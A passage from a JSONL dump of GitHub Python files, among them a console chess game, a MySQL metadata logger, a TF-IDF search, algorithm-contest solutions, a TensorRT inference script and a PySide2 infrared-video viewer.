'\\u265C',\n 'Knight': '\\u265E',\n 'Bishop': '\\u265D',\n 'Queen': '\\u265B',\n 'King': '\\u265A'\n }\n }\n self.board = self.initialize_board()\n\n @staticmethod\n def initialize_board():\n # Unicode characters for the chess pieces\n pieces = {\n 'white': {\n 'Pawn': '\\u2659',\n 'Rook': '\\u2656',\n 'Knight': '\\u2658',\n 'Bishop': '\\u2657',\n 'Queen': '\\u2655',\n 'King': '\\u2654'\n },\n 'black': {\n 'Pawn': '\\u265F',\n 'Rook': '\\u265C',\n 'Knight': '\\u265E',\n 'Bishop': '\\u265D',\n 'Queen': '\\u265B',\n 'King': '\\u265A'\n }\n }\n\n # Initialize an 8x8 chess board\n board = [[' ' for _ in range(8)] for _ in range(8)]\n\n # Place the pieces on the board\n for i in range(8):\n board[1][i] = pieces['black']['Pawn']\n board[6][i] = pieces['white']['Pawn']\n\n # Rooks\n board[0][0] = board[0][7] = pieces['black']['Rook']\n board[7][0] = board[7][7] = pieces['white']['Rook']\n\n # Knights\n board[0][1] = board[0][6] = pieces['black']['Knight']\n board[7][1] = board[7][6] = pieces['white']['Knight']\n\n # Bishops\n board[0][2] = board[0][5] = pieces['black']['Bishop']\n board[7][2] = board[7][5] = pieces['white']['Bishop']\n\n # Queens\n board[0][3] = pieces['black']['Queen']\n board[7][3] = pieces['white']['Queen']\n\n # Kings\n board[0][4] = pieces['black']['King']\n board[7][4] = pieces['white']['King']\n\n return board\n\n def get_piece_color(self, piece):\n if piece in self.pieces['white'].values():\n return 'white'\n elif piece in self.pieces['black'].values():\n return 'black'\n else:\n return None\n \n def print_board(self):\n print(' a b c d e f g h ')\n print(' +---+---+---+---+---+---+---+---+')\n for i, row in enumerate(self.board):\n print(f'{8-i} | ' + ' | '.join(row) + ' |')\n print(' +---+---+---+---+---+---+---+---+')\n\n def play_game(self):\n num_players = input(\"Enter the number of players (1 or 2): \")\n while num_players not in ['1', '2']:\n num_players = input(\"Invalid input. Please enter the number of players (1 or 2): \")\n\n if num_players == '1':\n players = [('Player', 'white'), ('Computer', 'black')]\n else:\n players = [('Player 1', 'white'), ('Player 2', 'black')]\n\n while True:\n for player, color in players:\n self.print_board()\n if player == 'Computer':\n piece_position, new_position = self.computer_move()\n else:\n piece_position = input(f\"{player}, enter the position of the piece to move (e.g., 'e2'): \")\n new_position = input(f\"{player}, enter the new position for the piece (e.g., 'e4'): \")\n self.move_piece(piece_position, new_position, color)\n\n def move_piece(self, piece_position, new_position, color):\n # Convert chess notation to board indices\n piece_x, piece_y = ord(piece_position[0]) - ord('a'), 8 - int(piece_position[1])\n new_x, new_y = ord(new_position[0]) - ord('a'), 8 - int(new_position[1])\n\n # Check if the move is allowed\n piece = self.board[piece_y][piece_x]\n target = self.board[new_y][new_x]\n if self.get_piece_color(piece) != color:\n print(\"Invalid move: the piece to move is not of your color.\")\n return\n if self.get_piece_color(piece) == self.get_piece_color(target):\n print(\"Invalid move: cannot move to a position occupied by a piece of the same color.\")\n return\n\n # Move the piece\n self.board[new_y][new_x] = self.board[piece_y][piece_x]\n self.board[piece_y][piece_x] = ' '\n\n def computer_move(self):\n # This is a very basic AI that chooses a random move.\n # You could replace this with a more sophisticated AI if you want.\n while True:\n piece_x = random.randint(0, 7)\n piece_y = random.randint(0, 7)\n new_x = random.randint(0, 7)\n new_y = random.randint(0, 7)\n if self.board[piece_y][piece_x] != ' ' and self.board[new_y][new_x] == ' ':\n piece_position = chr(piece_x + ord('a')) + str(8 - piece_y)\n new_position = chr(new_x + ord('a')) + str(8 - new_y)\n return piece_position, new_position\n\n\ngame = ChessGame()\ngame.print_board()\ngame.play_game()\n\n","repo_name":"FullByte/ASCIIgames","sub_path":"Chess/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28453156887","text":"\"\"\"\nLogs run metadata to MySQL.\n\"\"\"\n\nfrom typing import Optional\nimport sqlalchemy as db\n\nfrom ..dot import Dot\nfrom ..cli import console\n\n# Specify database configuration\nconfig = {\n 'host': 'localhost',\n 'port': 3307,\n 'user': 'root',\n 'password': 'password',\n 'database': 'meta'\n}\n\nengine: Optional[db.Engine] = None\nconnection: Optional[db.Connection] = None\n\n\ndef initialize():\n\n from ..shared import session\n if session.info.mysql:\n\n db_user = config.get('user')\n db_pwd = config.get('password')\n db_host = config.get('host')\n db_port = config.get('port')\n db_name = config.get('database')\n\n # Connection string\n connection_str = f'mysql+pymysql://{db_user}:{db_pwd}@{db_host}:{db_port}/{db_name}'\n\n # Connect to database\n global engine\n engine = db.create_engine(connection_str, echo=False)\n\n global connection\n connection = engine.connect()\n\n meta = db.MetaData()\n db.MetaData.reflect(meta, bind=engine)\n\n return engine, connection\n\n\ndef log_run(info: Dot):\n\n from ..shared import session\n if session.info.mysql:\n\n global engine\n global connection\n if connection is None or engine is None:\n engine, connection = initialize()\n\n meta = db.MetaData()\n db.MetaData.reflect(meta, bind=engine)\n\n table = meta.tables[\"runs\"]\n\n statement = (db.insert(table)\n .values(id=info.id,\n name=info.name,\n version=0,\n start_time=info.start_time))\n\n connection.execute(statement)\n connection.commit()\n\n\ndef log_metric(metric: Dot):\n\n from ..shared import session\n if session.info.mysql:\n\n global engine\n global connection\n if connection is None or engine is None:\n engine, connection = initialize()\n\n meta = db.MetaData()\n db.MetaData.reflect(meta, bind=engine)\n\n breakpoint()\n\n table = meta.tables[\"metrics\"]\n\n statement = (db.insert(table)\n .values(name=metric.name))\n\n connection.execute(statement)\n connection.commit()\n\n\nif __name__ == \"__main__\":\n initialize()\n","repo_name":"msc5/ml","sub_path":"src/database/mysql.py","file_name":"mysql.py","file_ext":"py","file_size_in_byte":2276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32131411599","text":"from sklearn.feature_extraction.text import TfidfVectorizer\r\nimport numpy as np\r\n\r\ndef search(query, documents):\r\n # Inisialisasi vectorizer\r\n vectorizer = TfidfVectorizer()\r\n\r\n # Hitung skor TF-IDF untuk setiap dokumen dalam korpus\r\n tfidf_matrix = vectorizer.fit_transform(documents)\r\n\r\n # Hitung skor TF-IDF untuk query\r\n query_vector = vectorizer.transform([query])\r\n\r\n # Temukan semua dokumen yang mengandung kata kunci\r\n found = False\r\n for doc_index, doc in enumerate(documents):\r\n if all(keyword in doc for keyword in query.split()):\r\n found = True\r\n break\r\n\r\n # Cetak hasil pencarian\r\n if found:\r\n for doc_index, doc in enumerate(documents):\r\n if all(keyword in doc for keyword in query.split()) and tfidf_matrix[doc_index, query_vector.indices[0]] > 0:\r\n term_positions = {}\r\n for term in query.split():\r\n positions = [i for i, token in enumerate(doc.split()) if token == term]\r\n term_positions[term] = positions\r\n for term, positions in term_positions.items():\r\n print(f'Dokumen {doc_index + 1}, index: {positions}')\r\n print(f'Skor= {round(tfidf_matrix[doc_index, query_vector.indices[0]], 4)}')\r\n\r\n else:\r\n print(\"Tidak ada dokumen yang ditemukan.\")\r\n\r\n","repo_name":"raishabirah/mesinPencari","sub_path":"tfIDF.py","file_name":"tfIDF.py","file_ext":"py","file_size_in_byte":1376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1637246105","text":"# greedy\n# 정렬 후 누적합\n\n# n = int(input())\n# p = sorted(map(int,input().split()))\n# for i in range(1,n):\n# p[i] += p[i-1]\n#\n# print(sum(p))\n#\n# # 2번 풀이\n# n = int(input())\n# p = sorted(map(int,input().split()),reverse=1)\n# ans = 0\n# for i in range(1,n+1):\n# ans += (i*p[i-1])\n# print(ans)\n\n\n\n# 예제 https://www.acmicpc.net/problem/1931\n# 끝나는 시간 기준 오름차순(sort)\n# 하나 기입 => 다음 시작 시간은 앞의 끝나는 시간 보다 커야 함\nn = int(input())\nt_data = []\nfor _ in range(n):\n t_data.append(list(map(int,input().split())))\n\n# 파티가 끝나느 시간 기준으로 sort\nt_data = sorted(t_data,key=lambda x:(x[1],x[0]))\nendtime = ans = 0\nfor i in range(n):\n if endtime<=t_data[i][0]:\n endtime = t_data[i][1]\n ans+=1\nprint(ans)","repo_name":"GureumKim/BOJ","sub_path":"Greedy/greedy_11399.py","file_name":"greedy_11399.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31400509004","text":"from world.content.astronomy import *\nimport math\nimport re\n\n\ndef _start(caller):\n caller.ndb._menutree.terminal.on_begin_use(caller)\n\n\ndef node_program_helm(caller):\n destination = PLANET_2\n current = PLANET_1\n x = math.pow(destination[\"x\"] - current[\"x\"], 2)\n y = math.pow(destination[\"y\"] - current[\"y\"], 2)\n raw_distance = round(math.sqrt(abs(x + y)), 4)\n distance = \"%s AU (%s mKM)\" % (raw_distance, round(raw_distance / 0.0066, 1))\n\n text = \"\"\"\n |wShip Status:|n In Orbit\n |wLocation:|n Atreus L2 Point\n |wNearest Body:|n Atreus\n |wDistance:|n 130,457km\n\n |wDestination:|n %s\n |wTravel Est:|n %s\n |wMax G-Force:|n 1g\n |wMax Speed:|n 3400 / 3400 km/s\n |wFuel Est:|n N/A\n |wRoute Calculated:|n |rNO|n\n\n |wIFF:|n |yWCFS-FOX|n\n |wThrusters:|n |gONLINE|n\n |wEngine:|n |gONLINE|n\n |wFuel Level:|n 1333.33 Litres\n \"\"\" % (destination[\"name\"], distance)\n\n options = [\n {\"key\": \"_default\", \"goto\": node_program_helm_parse},\n {\"key\": \"return\", \"goto\": _start},\n {\"key\": \"set\", \"goto\": \"22323\"},\n {\"key\": \"begin calc\", \"goto\": _begin_calc},\n {\"key\": \"reset\", \"goto\": _reset_nav},\n {\"key\": \"iff\", \"goto\": _toggle_iff}\n ]\n return text, options\n\n\ndef node_program_helm_parse(caller, raw_string):\n set_cmd = re.match(r'set (\\w+) to (\\w+|\\d+)', raw_string)\n if set_cmd:\n arg = set_cmd.group(1).lower()\n if \"destination\".startswith(arg):\n _set_destination(set_cmd.group(2))\n elif \"g-force\".startswith(arg):\n _set_g_force(set_cmd.group(2))\n elif \"speed\".startswith(arg):\n _set_speed(set_cmd.group(2))\n else:\n caller.msg(\"Invalid argument specified. Valid arguments: |wdestination, g-force, speed.|n\")\n return \"node_program_helm\"\n\n\ndef _set_destination(arg):\n pass\n\n\ndef _set_g_force(arg):\n pass\n\n\ndef _set_speed(arg):\n pass\n\n\ndef _toggle_iff(caller):\n caller.msg(\"You toggle IFF %s.\" % \"|gON|n\")\n return \"node_program_helm\"\n\n\ndef _reset_nav(caller):\n return \"node_program_helm\"\n\n\ndef _begin_calc(caller):\n return \"node_program_helm\"\n","repo_name":"biscuitWizard/evennia.singularity","sub_path":"singularity/menus/programs/ship_helm.py","file_name":"ship_helm.py","file_ext":"py","file_size_in_byte":2273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15233738129","text":"#!/usr/bin/python2\n### Google Code Jam template\n# Futures\nfrom __future__ import division\nfrom __future__ import with_statement\nfrom __future__ import print_function\n\nfrom collections import defaultdict\nimport heapq\n\n\n## Library\n# @memoized\ndef memoized(func):\n mem = {}\n\n def wrapped(*args):\n if args not in mem:\n mem[args] = func(*args)\n return mem[args]\n return wrapped\n\n## Input templates\n# Line as int\nreadint = lambda infile: int(infile.readline())\n# Line as many ints\nreadints = lambda infile: [int(s) for s in infile.readline().split()]\n\n\n# Base class\nclass ProblemSolver(object):\n def __init__(self):\n self.precalculate()\n\n def precalculate(self):\n raise NotImplementedError\n\n def process(self, infile, ncase):\n raise NotImplementedError\n\n def run(self, infile, outfile):\n cases = int(infile.readline())\n for ncase in range(cases):\n print(\"Case #{nc}\".format(nc=ncase + 1))\n # Perform all nessesary calculation\n data = self.process(infile, ncase=ncase)\n outfile.write(\"Case #{nc}: {data}\\n\".format(\n nc=ncase + 1, data=data))\n\n\n# Working class\nclass Solver(ProblemSolver):\n def precalculate(self):\n ## User code here\n pass\n\n def process(self, infile, ncase):\n ## User code here\n N = readint(infile)\n values = set(range(1, N + 1))\n A = readints(infile)\n B = readints(infile)\n # Build partial order\n less = defaultdict(lambda: set())\n for i, x in enumerate(A):\n prev = None\n for j, y in enumerate(A[:i]):\n if y >= x:\n less[j].add(i)\n if y == x - 1:\n prev = j\n if prev is not None:\n less[i].add(prev)\n Br = B[::-1]\n for i, x in enumerate(Br):\n prev = None\n for j, y in enumerate(Br[:i]):\n if y >= x:\n less[N - j - 1].add(N - i - 1)\n if y == x - 1:\n prev = j\n if prev is not None:\n less[N - i - 1].add(N - prev - 1)\n # Linearize\n sequence = []\n active = sorted(i for i in range(N) if not less[i])\n for i in active:\n del less[i]\n while active:\n current = heapq.heappop(active)\n sequence.append(current)\n for tgt, deps in list(less.items()):\n if current in deps:\n deps.remove(current)\n if not deps:\n del less[tgt]\n heapq.heappush(active, tgt)\n # Map back\n result = [None] * N\n for i, v in enumerate(sequence):\n result[v] = i\n return ' '.join(str(i + 1) for i in result)\n\n\n# Script code\nif __name__ == '__main__':\n ## Setup\n # Task letter\n from os.path import basename, splitext\n TASK = splitext(basename(__file__))[0]\n print(\"Task {}\".format(TASK))\n from sys import argv\n if len(argv) > 1:\n print(\"Filename given: {}\".format(argv[1]))\n FILE = splitext(argv[1])[0]\n else:\n FILE = TASK\n ## Precalculation\n print(\"Initialization...\")\n solver = Solver()\n print(\"Initialization done.\")\n ## Calculation\n print(\"Calculation...\")\n with open(FILE + \".in\") as infile:\n with open(FILE + \".out\", mode=\"wt\") as outfile:\n solver.run(infile, outfile)\n print(\"Calculation done.\")\n","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/CodeJamData/13/43/4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":3521,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"9260439801","text":"\nimport sys\nimport time\nimport traceback\n\nimport cv2\nimport h5py\nimport matplotlib\nimport matplotlib.cm\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom PySide2.QtCore import Slot\nfrom PySide2.QtGui import QPixmap, QImage, qRgb\nfrom PySide2.QtWidgets import QApplication, QComboBox, QHBoxLayout, QMainWindow, QPushButton, QVBoxLayout, QWidget, \\\n QLabel, QStatusBar, QScrollArea\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas\n\nfrom preprocess.image_sizing import IMAGE_DIMENSION\nfrom support.track_utils import extract_hdf5_frames, convert_frames, clip_and_scale, extract_hdf5_crops, FRAME_DIMS, \\\n normalize, prune_frames, smooth_resizer\n\nmatplotlib.use('Qt5Agg')\n\n\nDATASET_PATH = '/home/dennis/projects/irvideos/working-data/problem-clips.hdf5'\nCLIP_DIMS = [IMAGE_DIMENSION, IMAGE_DIMENSION]\nFIGURE_DPI = 100.0\n\n\nclass ViewTrack:\n\n def __init__(self, clip_id, track_id, background, track_hdf5):\n self.track_id = track_id\n self.background = background\n self.tag = track_hdf5.attrs['tag']\n frames = extract_hdf5_frames(track_hdf5['original'])\n self.camera_frames = frames\n self.difference_frames = self.camera_frames - background\n bounds = track_hdf5.attrs['bounds_history']\n self.raw_bounds = bounds\n crops = extract_hdf5_crops(track_hdf5['cropped'])\n self.raw_crops = crops\n masses = track_hdf5.attrs['mass_history']\n ocrops, oframes, obounds, omasses, _ = prune_frames(crops, frames, bounds, masses, clip_id, track_id)\n ratiofn = smooth_resizer(IMAGE_DIMENSION)\n aframes, obounds, ratios = convert_frames(frames, background, bounds, IMAGE_DIMENSION, ratiofn)\n self.adjust_crops = ocrops\n self.adjust_frames = aframes\n self.frame_bounds = obounds\n self.adjust_masses = omasses\n self.ratios = ratios\n self.current_index = 0\n\n def current_data(self):\n index = self.current_index\n print(f'returning acrop with shape {self.adjust_crops[index].shape}')\n return self.camera_frames[index], self.difference_frames[index], self.raw_crops[index], self.adjust_crops[index], self.adjust_frames[index], self.frame_bounds[index], self.adjust_masses[index]\n\n def next(self):\n if self.has_next():\n self.current_index += 1\n return self.current_data()\n\n def last(self):\n if self.has_last():\n self.current_index -= 1\n return self.current_data()\n\n def has_next(self):\n return self.current_index < len(self.adjust_frames) - 1\n\n def has_last(self):\n return self.current_index > 0\n\n\n\nclass ViewClip:\n\n def __init__(self, clip_id, clip_hdf5):\n self.clip_id = clip_id\n self.device_name = clip_hdf5.attrs.get('device')\n self.frames_per_second = clip_hdf5.attrs['frames_per_second']\n self.start_time = clip_hdf5.attrs['start_time']\n self.location = clip_hdf5.attrs.get('location')\n self.view_tracks = []\n self.background_frame = np.array(clip_hdf5['background_frame'])\n for key in clip_hdf5:\n try:\n if not key == 'background_frame':\n self.view_tracks.append(ViewTrack(clip_id, key, self.background_frame, clip_hdf5[key]))\n except Exception:\n print(f'Exception processing {clip_id}-{key}')\n traceback.print_exc()\n self.current_index = 0\n\n def current_track(self):\n return self.view_tracks[self.current_index]\n\n def last(self):\n if self.has_last():\n self.current_index -= 1\n return self.current_track()\n\n def has_next(self):\n return self.current_index < len(self.view_tracks) - 1\n\n def has_last(self):\n return self.current_index > 0\n\n\nclass Navigator:\n\n def __init__(self, clip_keys, clips_hdf5):\n self.clip_keys = clip_keys\n self.clips_hdf5 = clips_hdf5\n self.current_index = 0\n self.current_clip = None\n\n def current_data(self):\n clip_key = self.clip_keys[self.current_index]\n if self.current_clip is None or not self.current_clip.clip_id == clip_key:\n self.current_clip = ViewClip(clip_key, self.clips_hdf5[clip_key])\n return self.current_clip\n\n def next(self):\n if self.has_next():\n self.current_index += 1\n return self.current_data()\n\n def last(self):\n if self.has_last():\n self.current_index -= 1\n return self.current_data()\n\n def has_next(self):\n return self.current_index < len(self.clip_keys) - 1\n\n def has_last(self):\n return self.current_index > 0\n\n\nclass ViewerWindow(QMainWindow):\n\n def __init__(self, frame_dims, clip_dims, navigator):\n super().__init__()\n self.data_navigator = navigator\n self.frame_dims = frame_dims\n self.view_window = QWidget()\n self.setCentralWidget(self.view_window)\n main_layout = QVBoxLayout()\n self.top_label = QLabel()\n main_layout.addWidget(self.top_label)\n full_frame_layout = QHBoxLayout()\n full_frame_layout.addStretch()\n self.frame_display_dims = tuple([d * 2 for d in reversed(frame_dims)])\n w, h = self.frame_display_dims\n self.figure_index = 0\n self.cframe_figure = self._add_figure(h, w, full_frame_layout)\n self.dframe_figure = self._add_figure(h, w, full_frame_layout)\n self.bframe_figure = self._add_figure(h, w, full_frame_layout)\n full_frame_layout.addStretch()\n main_layout.addLayout(full_frame_layout)\n clips_layout = QHBoxLayout()\n main_layout.addLayout(clips_layout)\n clips_layout.addStretch()\n self.clip_display_dims = tuple([d * 5 for d in reversed(clip_dims)])\n h, w = self.clip_display_dims\n self.rcrop_label = self._add_label(h, w, clips_layout)\n self.acrop_label = self._add_label(h, w, clips_layout)\n self.xcrop_label = self._add_label(h, w, clips_layout)\n clips_layout.addStretch()\n self.frame_label = QLabel()\n main_layout.addWidget(self.frame_label)\n self.thumbnails_layout = QHBoxLayout()\n self.image_labels = []\n container_widget = QWidget()\n container_widget.setLayout(self.thumbnails_layout)\n scroll_area = QScrollArea()\n scroll_area.setWidget(container_widget)\n main_layout.addWidget(scroll_area)\n display_controls_layout = QHBoxLayout()\n main_layout.addLayout(display_controls_layout)\n self.last_view_button = self._add_button('<<', 120, display_controls_layout)\n self.last_view_button.clicked.connect(self._last_view_button)\n self.track_combo_box = self._add_combo_box([], 120, display_controls_layout)\n self.last_frame_button = self._add_button('<', 120, display_controls_layout)\n self.last_frame_button.clicked.connect(self._last_frame_button)\n self.play_button = self._add_button('Play', 120, display_controls_layout)\n self.play_button.clicked.connect(self._play_button)\n self.play_button.setAutoRepeat(True)\n self.play_button.setAutoRepeatInterval(1000)\n self.next_frame_button = self._add_button('>', 120, display_controls_layout)\n self.next_frame_button.clicked.connect(self._next_frame_button)\n self.next_view_button = self._add_button('>>', 120, display_controls_layout)\n self.next_view_button.clicked.connect(self._next_view_button)\n display_controls_layout.addStretch()\n self.status_bar = QStatusBar()\n self.status_bar.showMessage('Initializing...')\n main_layout.addWidget(self.status_bar)\n self.view_window.setLayout(main_layout)\n self.set_clip(navigator.current_data)\n\n @Slot()\n def _next_view_button(self):\n self.set_clip(self.data_navigator.next)\n\n @Slot()\n def _last_view_button(self):\n self.set_clip(self.data_navigator.last)\n\n @Slot()\n def _next_frame_button(self):\n self.set_frame(self.view_track.next)\n\n @Slot()\n def _last_frame_button(self):\n self.set_frame(self.view_track.last)\n\n @Slot()\n def _play_button(self):\n self.set_frame(self.view_track.next)\n\n @Slot()\n def _track_combo(self):\n track_id = self.track_combo_box.currentText()\n view_track = [t for t in self.view_clip.view_tracks if t.track_id == track_id][0]\n self.set_track(view_track)\n\n def _add_button(self, text, maxwidth, layout):\n layout.addSpacing(40)\n button = QPushButton(text)\n button.setFixedWidth(maxwidth)\n layout.addWidget(button)\n #button.setStyleSheet('background-color: AliceBlue;')\n return button\n\n def _add_combo_box(self, choices, maxwidth, layout):\n layout.addSpacing(40)\n combo_box = QComboBox()\n combo_box.addItems(choices)\n combo_box.setFixedWidth(maxwidth)\n layout.addWidget(combo_box)\n return combo_box\n\n def _add_label(self, h, w, layout):\n layout.addSpacing(40)\n label = QLabel()\n print(f'setting label height {h}, width {w}')\n label.setFixedSize(w, h)\n layout.addWidget(label)\n return label\n\n def _add_figure(self, h, w, layout):\n layout.addSpacing(40)\n self.figure_index += 1\n tight = { 'pad': .0 }\n figure = plt.figure(self.figure_index, figsize=(w/FIGURE_DPI, h/FIGURE_DPI), frameon=False, tight_layout=tight)\n canvas = FigureCanvas(figure)\n layout.addWidget(canvas)\n return (figure.add_subplot(), canvas)\n\n def _set_clip_track_label(self):\n clip = self.view_clip\n location = clip.location if clip.location is not None else 'unknown location'\n track = self.view_track\n self.top_label.setText(f'Clip {clip.clip_id} recorded at {location} starting at {clip.start_time}: Track {track.track_id} identified as {track.tag} with {len(track.raw_bounds)} frames')\n\n def set_clip(self, clipfn):\n self.status_bar.showMessage('Loading clip...')\n view_clip = clipfn()\n self.view_clip = view_clip\n self.last_view_button.setEnabled(self.data_navigator.has_last())\n self.next_view_button.setEnabled(self.data_navigator.has_next())\n self.track_combo_box.currentTextChanged.connect(None)\n for i in range(self.track_combo_box.count()):\n self.track_combo_box.removeItem(i)\n track_ids = [t.track_id for t in view_clip.view_tracks]\n self.track_combo_box.addItems(track_ids)\n self.track_combo_box.currentTextChanged.connect(self._track_combo)\n self.set_track(view_clip.view_tracks[0])\n self.status_bar.clearMessage()\n\n def set_track(self, view_track):\n self.status_bar.showMessage(f'Setting track {view_track.track_id}')\n self.view_track = view_track\n self.set_frame(view_track.current_data)\n self.status_bar.showMessage(f'Set track {view_track.track_id}', 2000)\n self._set_clip_track_label()\n #self.thumbnails_layout = QHBoxLayout()\n #self.image_labels = []\n\n def _draw_to_label(self, data, dims, label):\n start = time.process_time()\n data = cv2.resize(data, dims, interpolation=cv2.INTER_CUBIC)\n h, w = data.shape\n image = QImage(w, h, QImage.Format_RGB32)\n frame = normalize(data).astype(np.uint8)\n raw_values = matplotlib.cm.magma(frame)\n #print(f'magma values min {raw_values.min()}, max {raw_values.max()}')\n color_values = np.uint8(raw_values * 255)\n for rnum in range(h):\n for cnum in range(w):\n values = color_values[rnum, cnum]\n image.setPixel(cnum, rnum, qRgb(values[0], values[1], values[2]))\n label.setPixmap(QPixmap.fromImage(image))\n label.update()\n print(f'drawing label took {time.process_time() - start:.4f} seconds')\n\n def set_frame(self, framefn):\n cframe, dframe, rcrop, acrop, aframe, bounds, amass = framefn()\n track = self.view_track\n index = track.current_index\n pixel_count = np.sum(track.raw_crops[index] > 0)\n raw_bounds = track.raw_bounds[index]\n bound_dims = (raw_bounds[2]-raw_bounds[0], raw_bounds[3]-raw_bounds[1])\n self.frame_label.setText(f'Frame {index} : mass {track.adjust_masses[index]} pixel count {pixel_count} raw bounds {raw_bounds} dimension {bound_dims}')\n self.last_frame_button.setEnabled(self.view_track.has_last())\n self.next_frame_button.setEnabled(self.view_track.has_next())\n for frame, (axes, canvas) in [(cframe, self.cframe_figure), (dframe, self.dframe_figure), (self.view_track.background, self.bframe_figure)]:\n #print(f'drawing image of size {frame.shape} from track - min {frame.min()}, max {frame.max()}')\n frame = clip_and_scale(frame)\n #print(f'after clipping and scaling min {frame.min()}, max {frame.max()}')\n #self._draw_to_label(frame, self.frame_display_dims, label)\n start = time.process_time()\n axes.axis('off')\n axes.imshow(frame, cmap='magma', origin='upper', aspect='auto', interpolation='hamming')\n canvas.draw()\n print(f'drawing figure took {time.process_time() - start:.4f} seconds')\n rcrop = clip_and_scale(rcrop)\n display_dims = tuple([d * 5 for d in reversed(rcrop.shape)])\n self.rcrop_label.setFixedSize(display_dims[0], display_dims[1])\n self._draw_to_label(rcrop, display_dims, self.rcrop_label)\n for crop, label in [(acrop, self.acrop_label), (aframe, self.xcrop_label)]:\n crop = clip_and_scale(crop)\n self._draw_to_label(crop, self.clip_display_dims, label)\n\n\ndef run_ui():\n file_hdf5 = h5py.File(DATASET_PATH, 'r')\n clips_hdf5 = file_hdf5['clips']\n app = QApplication()\n app.setApplicationName('Cacophony Infrared Video Viewer')\n clip_keys = [k for k in clips_hdf5]\n navigator = Navigator(clip_keys, clips_hdf5)\n window = ViewerWindow(FRAME_DIMS, CLIP_DIMS, navigator)\n window.resize(1200, 800)\n window.show()\n sys.exit(app.exec_())\n\n\nif __name__ == '__main__':\n run_ui()","repo_name":"dsosnoski/irvideo-classification","sub_path":"preprocess/sample_viewer.py","file_name":"sample_viewer.py","file_ext":"py","file_size_in_byte":14187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73963452392","text":"import argparse\nimport tensorrt as trt\nimport pycuda.driver as cuda\nimport numpy as np\nimport pycuda.autoinit\n\n\nTRT_LOGGER = trt.Logger()\n\n\nclass HostDeviceMem(object):\n def __init__(self, host_mem, device_mem):\n self.host = host_mem\n self.device = device_mem\n\n def __str__(self):\n return \"Host:\\n\" + str(self.host) + \"\\nDevice:\\n\" + str(self.device)\n\n def __repr__(self):\n return self.__str__()\n\n\ndef load_engine(engine_path):\n with open(engine_path, \"rb\") as f, trt.Runtime(TRT_LOGGER) as runtime:\n return runtime.deserialize_cuda_engine(f.read())\n \ndef allocate_buffers(engine):\n inputs = list()\n outputs = list()\n bindings = list()\n for binding in engine:\n size = trt.volume(engine.get_binding_shape(binding)) * \\\n engine.max_batch_size * np.dtype(np.float32).itemsize\n dtype = trt.nptype(engine.get_binding_dtype(binding))\n # Allocate host and device buffers\n host_mem = cuda.pagelocked_empty(size, dtype)\n device_mem = cuda.mem_alloc(host_mem.nbytes)\n # Append the device buffer to device bindings.\n bindings.append(int(device_mem))\n # Append to the appropriate list.\n if engine.binding_is_input(binding):\n inputs.append(HostDeviceMem(host_mem, device_mem))\n else:\n outputs.append(HostDeviceMem(host_mem, device_mem))\n return inputs, outputs, bindings\n\n\ndef evaluate(engine, host_input):\n cuda.init()\n device = cuda.Device(0) # enter your Gpu id here\n ctx = device.make_context()\n stream = cuda.Stream()\n inputs, outputs, bindings = allocate_buffers(engine)\n ctx.pop()\n inputs[0].host = host_input\n context = engine.create_execution_context()\n # Transfer input data to the GPU.\n [cuda.memcpy_htod_async(inp.device, inp.host, stream)\n for inp in inputs]\n # Run inference.\n context.execute_async_v2(bindings=bindings, stream_handle=stream.handle)\n # Transfer predictions back from the GPU.\n [cuda.memcpy_dtoh_async(out.host, out.device, stream)\n for out in outputs]\n # Synchronize the stream\n stream.synchronize()\n # Return only the host outputs.\n outputs = [out.host for out in outputs]\n return np.argmax(outputs)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='TensorRT Inference')\n parser.add_argument('--engine', type=str, default='resnet-18-fp32.engine',\n help='Path to serialized engine file')\n\n args = parser.parse_args()\n\n engine = load_engine(args.engine)\n # input_shape = engine.get_binding_shape()\n # input_shape = (1, 3, input_shape[2], input_shape[3])\n # print(input_shape)\n input_shape = (1, 3, 224, 224)\n input_data = np.random.rand(*input_shape)\n print(evaluate(engine, input_data))\n\n ","repo_name":"jc-su/tvm_tensorrt","sub_path":"python/trt_evaluate.py","file_name":"trt_evaluate.py","file_ext":"py","file_size_in_byte":2829,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"32699784566","text":"import os\r\n\r\nImagepath = os.path.abspath('C:/Users/asus/Whatsapp Automation/test.jpg')\r\ndriver.find_element_by_id(\"Id of the element\").clear()\r\ndriver.find_element_by_id(\"Id of the element\").send_keys(Imagepath)\r\n\r\n\r\nelm.send_keys(os.getcwd() + \"/test.jpg\")\r\n\r\n\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.action_chains import ActionChains\r\n\r\ndriver = webdriver.Firefox()\r\ndriver.get(\"your.site.with.dragndrop.functionality.com\")\r\nsource_element = driver.find_element_by_name('your element to drag')\r\ndest_element = driver.find_element_by_name('element to drag to')\r\nActionChains(driver).drag_and_drop(source_element, dest_element).perform()","repo_name":"sudamerushabh/whatsappAutomation","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7801308661","text":"textul=input(\"Introduceti textul dorit:\")\r\ndef litera_mare(textul):\r\n propozitii=textul.split('.')\r\n for i in propozitii:\r\n print(i.capitalize())\r\n\r\nlitera_mare(textul)\r\n\r\ntextul2=input(\"Introduceti textul dorit:\")\r\ndef dictionar_count(textul):\r\n numaraparitii = {}\r\n for n in textul:\r\n keys 